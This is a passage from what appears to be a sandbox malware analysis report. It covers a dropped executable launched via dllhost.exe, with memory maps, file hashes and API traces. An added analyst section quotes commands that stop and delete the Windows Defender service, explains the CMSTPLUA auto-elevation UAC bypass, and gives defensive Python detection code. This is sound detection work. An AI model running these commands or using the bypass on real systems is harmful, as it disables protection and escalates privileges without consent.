Write STD_OUTPUT_HANDLE size = 51 True 1
Module (1)
Operation Module Additional Information Success Count
Get Handle c:\windows\syswow64\sc.exe base_address = 0x840000 True 1
Service (2)
Operation Additional Information Success Count
Open database_name = SERVICES_ACTIVE_DATABASE False 1
Open Manager database_name = SERVICES_ACTIVE_DATABASE True 1
System (2)
Operation Additional Information Success Count
Get Time type = System Time, time = 2018-06-25 14:54:41 (UTC) True 1
Get Time type = Ticks, time = 269273 True 1
Process #21: dllhost.exe
0 0
Information Value
ID #21
File Name c:\windows\syswow64\dllhost.exe
Command Line C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:46, Reason: RPC Server
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:22
Remarks No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0x200
Parent PID 0x248 (c:\windows\system32\svchost.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x6B8
0x264
0xF8
0x224
0x788
0x40C
0x5DC
0x794
0x468
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00060000 0x000c6fff Memory Mapped File Readable False False False -
pagefile_0x00000000000d0000 0x000d0000 0x000d0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000000f0000 0x000f0000 0x000f0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000100000 0x00100000 0x00101fff Pagefile Backed Memory Readable True False False -
cversions.2.db 0x00110000 0x00113fff Memory Mapped File Readable True False False -
pagefile_0x0000000000120000 0x00120000 0x00121fff Pagefile Backed Memory Readable True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db 0x00130000 0x0014efff Memory Mapped File Readable True False False -
private_0x0000000000150000 0x00150000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00190fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000001a0000 0x001a0000 0x001dffff Private Memory Readable, Writable True False False -
cversions.2.db 0x001e0000 0x001e3fff Memory Mapped File Readable True False False -
pagefile_0x00000000001f0000 0x001f0000 0x001f6fff Pagefile Backed Memory Readable True False False -
private_0x0000000000200000 0x00200000 0x0023ffff Private Memory Readable, Writable True False False -
private_0x0000000000240000 0x00240000 0x0027ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000280000 0x00280000 0x00407fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000410000 0x00410000 0x00411fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000420000 0x00420000 0x0049ffff Private Memory Readable, Writable True False False -
private_0x00000000004a0000 0x004a0000 0x004dffff Private Memory Readable, Writable True False False -
private_0x00000000004f0000 0x004f0000 0x0052ffff Private Memory Readable, Writable True False False -
private_0x0000000000530000 0x00530000 0x0056ffff Private Memory Readable, Writable True False False -
private_0x0000000000590000 0x00590000 0x005cffff Private Memory Readable, Writable True False False -
dllhost.exe 0x005d0000 0x005d4fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x00000000005e0000 0x005e0000 0x00760fff Pagefile Backed Memory Readable True False False -
private_0x0000000000780000 0x00780000 0x0087ffff Private Memory Readable, Writable True False False -
private_0x00000000008a0000 0x008a0000 0x008dffff Private Memory Readable, Writable True False False -
private_0x00000000008e0000 0x008e0000 0x0091ffff Private Memory Readable, Writable True False False -
private_0x0000000000920000 0x00920000 0x0095ffff Private Memory Readable, Writable True False False -
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000a.db 0x00960000 0x0098ffff Memory Mapped File Readable True False False -
private_0x00000000009a0000 0x009a0000 0x009dffff Private Memory Readable, Writable True False False -
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db 0x009e0000 0x00a45fff Memory Mapped File Readable True False False -
private_0x0000000000a50000 0x00a50000 0x00a5ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000a60000 0x00a60000 0x01e5ffff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x01e60000 0x0212efff Memory Mapped File Readable False False False -
private_0x00000000021a0000 0x021a0000 0x021dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000021e0000 0x021e0000 0x022befff Pagefile Backed Memory Readable True False False -
private_0x0000000002350000 0x02350000 0x0238ffff Private Memory Readable, Writable True False False -
private_0x0000000002400000 0x02400000 0x0243ffff Private Memory Readable, Writable True False False -
private_0x0000000002440000 0x02440000 0x0253ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002540000 0x02540000 0x02932fff Pagefile Backed Memory Readable True False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x74380000 0x743a0fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrtremote.dll 0x743c0000 0x743cdfff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x74720000 0x7472afff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x747f0000 0x7498dfff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74ee0000 0x74f5ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
shdocvw.dll 0x753c0000 0x753edfff Memory Mapped File Readable, Writable, Executable False False False -
apphelp.dll 0x75460000 0x754abfff Memory Mapped File Readable, Writable, Executable False False False -
propsys.dll 0x754b0000 0x755a4fff Memory Mapped File Readable, Writable, Executable False False False -
cmlua.dll 0x755f0000 0x755fbfff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x75600000 0x75608fff Memory Mapped File Readable, Writable, Executable False False False -
cmutil.dll 0x75610000 0x7561dfff Memory Mapped File Readable, Writable, Executable False False False -
cmstplua.dll 0x75620000 0x75627fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x75870000 0x759a5fff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x759b0000 0x759d6fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
devobj.dll 0x75b30000 0x75b41fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
setupapi.dll 0x760c0000 0x7625cfff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x76260000 0x7637cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76390000 0x76412fff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x76420000 0x76464fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x76470000 0x7647bfff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76480000 0x770c9fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x772c0000 0x773b4fff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x77450000 0x7764afff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efa4000 0x7efa4000 0x7efa6fff Private Memory Readable, Writable True False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Process #22: oyvhkhw.exe
979 0
Information Value
ID #22
File Name c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe
Command Line "C:\Users\kFT6uTQW\AppData\Roaming\tarutils\oyvHkHw.exe"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:46, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:22
OS Process Information
Information Value
PID 0x3d4
Parent PID 0x200 (c:\windows\syswow64\dllhost.exe)
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x6A0
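Two things in processes #19 to #22 are worth turning into detections. First, #19 and #20 run sc delete WinDefend and sc stop WinDefend from cmd.exe at Medium integrity; stopping or deleting the Defender service needs administrative rights, and both processes record one refused open of SERVICES_ACTIVE_DATABASE followed by a plain manager open and nothing else, so these entries document intent rather than a disabled Defender. Second, #21 is a dllhost.exe COM surrogate for {3E5FC7F9-9A51-4367-9063-A120244FBEC7}, the CMSTPLUA class behind the ICMLuaUtil interface (its module list includes cmstplua.dll and cmlua.dll); that class auto-elevates, and its ShellExec method is a well-known UAC bypass, which is consistent with #22, the dropped oyvHkHw.exe under the user's AppData\Roaming, starting at High (Elevated) integrity with the surrogate as its parent while the document chain before it ran at Medium. The Python below is an added example, not VMRay's code and not part of the sample; it runs both checks over records constructed from the PID, parent PID, image, command line and integrity fields printed above. The Proc type, the field names, the extra benign dllhost record and the user-writable path list are this example's own assumptions.

```python
"""Added example (not VMRay code): two detections over sandbox process records.
 1. sc.exe stop/delete/config against the Windows Defender service (WinDefend)
 2. a High-integrity child of a dllhost.exe surrogate hosting the CMSTPLUA CLSID,
    the signature of the ICMLuaUtil auto-elevation UAC bypass
The SAMPLE records are constructed from the fields of processes #19-#22 in the
report; the Proc type and field names are this example's own."""
import re
from dataclasses import dataclass

# CLSID of the CMSTPLUA COM server (ICMLuaUtil). It is marked auto-elevate, so a
# Medium-integrity caller gets a High-integrity dllhost.exe surrogate whose
# ShellExec method launches whatever path it is handed.
CMSTPLUA_CLSID = "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"

# sc.exe verbs that stop, remove or reconfigure the Defender service.
DEFENDER_SC = re.compile(r"^\s*sc(?:\.exe)?\s+(stop|delete|config)\s+windefend\b", re.I)

# Directories a standard user can write to (assumed list); an elevated image
# running from one of them is a strong signal by itself.
USER_WRITABLE = re.compile(r"\\(appdata|temp|downloads)\\", re.I)


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    image: str       # lower-case path as the report prints it
    cmdline: str
    integrity: str   # "Medium", "High (Elevated)", ...


# Constructed sample modelled on processes #19-#22 of the report, plus one
# benign dllhost surrogate for a different CLSID that has no child.
SAMPLE = [
    Proc(0x9a4, 0x77c, r"c:\windows\syswow64\sc.exe", "sc delete WinDefend", "Medium"),
    Proc(0x9d8, 0x13c, r"c:\windows\syswow64\sc.exe", "sc stop WinDefend", "Medium"),
    Proc(0x200, 0x248, r"c:\windows\syswow64\dllhost.exe",
         r"C:\Windows\SysWOW64\DllHost.exe /Processid:" + CMSTPLUA_CLSID, "High (Elevated)"),
    Proc(0x3d4, 0x200, r"c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe",
         r'"C:\Users\kFT6uTQW\AppData\Roaming\tarutils\oyvHkHw.exe"', "High (Elevated)"),
    Proc(0x500, 0x248, r"c:\windows\system32\dllhost.exe",
         r"C:\Windows\system32\DllHost.exe /Processid:{00000000-0000-0000-0000-000000000000}",
         "High (Elevated)"),
]


def is_elevated(p: Proc) -> bool:
    return p.integrity.lower().startswith(("high", "system"))


def defender_tampering(procs):
    """sc.exe stop/delete/config against WinDefend. 'elevated' records whether
    the caller could actually have succeeded: the operation needs administrative
    rights, so a Medium-integrity hit is intent, not a disabled Defender."""
    hits = []
    for p in procs:
        m = DEFENDER_SC.match(p.cmdline)
        if m and p.image.lower().endswith("\\sc.exe"):
            hits.append({"pid": p.pid, "verb": m.group(1).lower(), "elevated": is_elevated(p)})
    return hits


def cmstplua_uac_bypass(procs):
    """A dllhost.exe surrogate for the CMSTPLUA CLSID with a High-integrity child.
    The child image living in a user-writable directory raises confidence."""
    by_pid = {p.pid: p for p in procs}
    hits = []
    for p in procs:
        parent = by_pid.get(p.ppid)
        if parent is None or not parent.image.lower().endswith("\\dllhost.exe"):
            continue
        if CMSTPLUA_CLSID.lower() not in parent.cmdline.lower():
            continue
        if not is_elevated(p):
            continue
        hits.append({"pid": p.pid, "surrogate_pid": parent.pid, "image": p.image,
                     "user_writable": bool(USER_WRITABLE.search(p.image))})
    return hits


if __name__ == "__main__":
    for h in defender_tampering(SAMPLE):
        print("defender tampering:", h)
    for h in cmstplua_uac_bypass(SAMPLE):
        print("CMSTPLUA UAC bypass:", h)
```

On the sample the first check returns the delete and stop attempts with elevated=False, and the second returns exactly one hit: child 0x3d4 under surrogate 0x200, flagged as running from a user-writable path. The same parent/child, CLSID and integrity fields are available from Sysmon event ID 1 or an EDR process tree, so the logic ports directly to live telemetry.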
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000090000 0x00090000 0x00093fff Pagefile Backed Memory Readable True False False -
private_0x00000000000a0000 0x000a0000 0x000affff Private Memory Readable, Writable True False False -
private_0x00000000000b0000 0x000b0000 0x000bffff Private Memory Readable, Writable True False False -
pagefile_0x00000000000c0000 0x000c0000 0x000c6fff Pagefile Backed Memory Readable True False False -
private_0x00000000000d0000 0x000d0000 0x0014ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000150000 0x00150000 0x00151fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000160000 0x00160000 0x00161fff Private Memory Readable, Writable True False False -
private_0x0000000000180000 0x00180000 0x0027ffff Private Memory Readable, Writable True False False -
locale.nls 0x00280000 0x002e6fff Memory Mapped File Readable False False False -
private_0x00000000002f0000 0x002f0000 0x0039ffff Private Memory Readable, Writable True False False -
rsaenh.dll 0x002f0000 0x0032bfff Memory Mapped File Readable False False False -
~df0894a2d8a2a8bfc2.tmp 0x002f0000 0x0036ffff Memory Mapped File Readable, Writable True True False
private_0x0000000000390000 0x00390000 0x0039ffff Private Memory Readable, Writable True False False -
private_0x00000000003e0000 0x003e0000 0x003effff Private Memory Readable, Writable True False False -
oyvhkhw.exe 0x00400000 0x00451fff Memory Mapped File Readable, Writable, Executable True True False
private_0x0000000000460000 0x00460000 0x0cabffff Private Memory Readable, Writable True False False -
pagefile_0x000000000cac0000 0x0cac0000 0x0cc47fff Pagefile Backed Memory Readable True False False -
private_0x000000000cc60000 0x0cc60000 0x0cc6ffff Private Memory Readable, Writable True False False -
pagefile_0x000000000cc70000 0x0cc70000 0x0cdf0fff Pagefile Backed Memory Readable True False False -
pagefile_0x000000000ce00000 0x0ce00000 0x0e1fffff Pagefile Backed Memory Readable True False False -
private_0x000000000e200000 0x0e200000 0x0e5fffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x0e600000 0x0e8cefff Memory Mapped File Readable False False False -
private_0x000000000e8d0000 0x0e8d0000 0x0e97ffff Private Memory Readable, Writable True False False -
private_0x000000000e980000 0x0e980000 0x0eaeffff Private Memory Readable, Writable True False False -
pagefile_0x000000000e980000 0x0e980000 0x0ea5efff Pagefile Backed Memory Readable True False False -
private_0x000000000eab0000 0x0eab0000 0x0eaeffff Private Memory Readable, Writable True False False -
private_0x000000000eaf0000 0x0eaf0000 0x0ec6ffff Private Memory Readable, Writable True False False -
private_0x000000000eaf0000 0x0eaf0000 0x0eb6ffff Private Memory Readable, Writable True False False -
private_0x000000000ec30000 0x0ec30000 0x0ec6ffff Private Memory Readable, Writable True False False -
pagefile_0x000000000ec70000 0x0ec70000 0x0f06ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000000000f070000 0x0f070000 0x0f462fff Pagefile Backed Memory Readable True False False -
staticcache.dat 0x0f470000 0x0fd9ffff Memory Mapped File Readable False False False -
private_0x000000000fda0000 0x0fda0000 0x0fe9ffff Private Memory Readable, Writable True False False -
asycfilt.dll 0x6fcd0000 0x6fce3fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
msvbvm60.dll 0x72940000 0x72a92fff Memory Mapped File Readable, Writable, Executable True False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x74ec0000 0x74ed2fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74ee0000 0x74f5ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
sxs.dll 0x752d0000 0x7532efff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Created Files
Filename File Size Hash Values YARA Match Actions
c:\users\kft6utqw\appdata\local\temp\~df0894a2d8a2a8bfc2.tmp 16.00 KB MD5: ce338fe6899778aacfc28414f2d9498b
SHA1: 897256b6709e1a4da9daba92b6bde39ccfccd8c1
SHA256: 4fe7b59af6de3b665b67788cc2f99892ab827efae3a467342b3bb4e3bc8e5bfe
False
Host Behavior
File (6)
Operation Filename Additional Information Success Count Logfile
Get Info STD_INPUT_HANDLE type = file_type False 1
Fn
Get Info STD_OUTPUT_HANDLE type = file_type False 1
Fn
Get Info STD_ERROR_HANDLE type = file_type False 1
Fn
Open STD_INPUT_HANDLE - True 1
Fn
Open STD_OUTPUT_HANDLE - True 1
Fn
Open STD_ERROR_HANDLE - True 1
Fn
Registry (2)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors - False 2
Fn
Module (83)
Operation Module Additional Information Success Count Logfile
Load OLEAUT32.DLL base_address = 0x75a00000 True 1
Fn
Load SXS.DLL base_address = 0x752d0000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75fb0000 True 2
Fn
Get Handle c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe base_address = 0x400000 True 1
Fn
Get Handle c:\windows\syswow64\oleaut32.dll base_address = 0x75a00000 True 1
Fn
Get Handle c:\windows\syswow64\ole32.dll base_address = 0x75be0000 True 1
Fn
Get Handle c:\windows\syswow64\user32.dll base_address = 0x771c0000 True 1
Fn
Get Filename - process_name = c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Roaming\tarutils\oyvHkHw.exe, size = 260 True 3
Fn
Get Filename - process_name = c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 True 3
Fn
Get Filename c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe process_name = c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Roaming\tarutils\oyvHkHw.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsTNT, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x75fc5235 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = OleLoadPictureEx, address_out = 0x75a670a1 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = DispCallFunc, address_out = 0x75a13dcf True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = LoadTypeLibEx, address_out = 0x75a107b7 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = UnRegisterTypeLib, address_out = 0x75a31ca9 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = CreateTypeLib2, address_out = 0x75a18e70 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDateFromUdate, address_out = 0x75a17684 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarUdateFromDate, address_out = 0x75a1cc98 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = GetAltMonthNames, address_out = 0x75a4903a True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarNumFromParseNum, address_out = 0x75a16231 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarParseNumFromStr, address_out = 0x75a15fea True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecFromR4, address_out = 0x75a23f94 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecFromR8, address_out = 0x75a24e9e True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecFromDate, address_out = 0x75a4db72 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecFromI4, address_out = 0x75a32a8c True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecFromCy, address_out = 0x75a4d737 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarR4FromDec, address_out = 0x75a4e015 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = GetRecordInfoFromTypeInfo, address_out = 0x75a4cc3d True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = GetRecordInfoFromGuids, address_out = 0x75a4d1c4 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SafeArrayGetRecordInfo, address_out = 0x75a4d48c True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SafeArraySetRecordInfo, address_out = 0x75a4d4c6 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SafeArrayGetIID, address_out = 0x75a4d509 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SafeArraySetIID, address_out = 0x75a1e7bb True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SafeArrayCopyData, address_out = 0x75a1e496 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SafeArrayAllocDescriptorEx, address_out = 0x75a1ddf1 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SafeArrayCreateEx, address_out = 0x75a4d53f True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarFormat, address_out = 0x75a52055 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarFormatDateTime, address_out = 0x75a520ea True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarFormatNumber, address_out = 0x75a52151 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarFormatPercent, address_out = 0x75a521f5 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarFormatCurrency, address_out = 0x75a52288 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarWeekdayName, address_out = 0x75a52335 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarMonthName, address_out = 0x75a523d5 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarAdd, address_out = 0x75a25934 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarAnd, address_out = 0x75a25a98 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarCat, address_out = 0x75a259b4 True 1
Fn
